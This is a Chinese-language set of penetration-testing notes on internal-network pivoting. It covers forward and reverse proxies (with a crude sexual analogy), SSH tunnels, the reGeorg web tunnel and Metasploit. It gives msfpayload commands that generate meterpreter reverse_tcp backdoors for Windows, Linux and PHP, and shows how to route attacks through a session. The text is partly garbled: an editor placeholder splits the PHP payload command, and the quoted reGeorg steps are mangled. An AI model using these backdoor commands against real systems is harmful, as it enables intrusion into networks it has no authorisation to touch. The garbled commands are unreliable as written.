内网渗透笔记-端口转发,内网代理
1.1 正向代理(Forward Proxy)
Lhost--》proxy--》Rhost Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。
1.2 反向代理(reverse proxy)
Lhost<--->proxy<--->firewall<--->Rhost 和正向代理相反(废话),Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透
1.3 简单区分
正向代理是我们自己(Lhost)戴套(proxy)插进去,反向代理是她(Rhost)主动通过上位(proxy)坐上来(Lhost)
zone里内网渗透代理问题有人问了如何代理进行内网渗透的问题 诚然,要进行内网渗透,代理是我们最先需要解决的问题,常见的代理方式大概可以分为这么几种:
2. VPN隧道/SSH隧道
这种代理方式需要比较高的权限(system/root)直接使用系统功能来开启内网代理的隧道,配置VPN都比较简单,这里不做赘述,我们看一看通过SSH隧道进行代理
3. 通过HTTP service的代理
reGeorg自带的说明已经很Step 1. Upload tunnel.(aspx|ashx|jsp|php) to a webserver (How you do that is up to you)
Step 2. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py
** Note, if you tools, such as NMap doesn’t support socks proxies, use [proxychains] (see wiki)p 3. Hack the planet :) 注意安装urllib3即可(regeorg很方便,我基本都用这个)
meterpreter msf非常强大,在进行内网渗透的时候不失为一个好的选择,要用它进行代理,可以直接生成一个可执行文件后门,然后返回meterpreter,也可以生成一个webshell来返回meterpreter,关于meterpreter,Dm老师已经说的非常清楚了metasploit 渗透测试笔记(meterpreter篇)
3.1 windows生成后门
#!bash msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
3.2 Linux生成后门
#!bash msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell php后门
msfpayload php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR`这里写代码片`T=<Your Port to Connect On> R | msfencode -e php/base64(可简单编码) -t raw -o base64php.php 获得meterpreter会话后,就是msf尽情施展的时候了,最常用的办法,添加路由表后,直接在会话中用msf的各种攻击模块进行扫描(注意,这里是可以进行跨网段扫描的) 如果单纯只是想要进行简单的代理工作,auxiliary/server/socks4a模块即可 这里讲到meterpreter所以多说一句,之前说的ssh隧道,如果嫌命令难得记,也可以简单的通过msf来建立tunnel load meta_ssh use multi/ssh/login_password 设置好参数后exploit即可获取会话进行代理操作 直接通过webshell和nginx反向代理 http://zone.wooyun.org/content/11096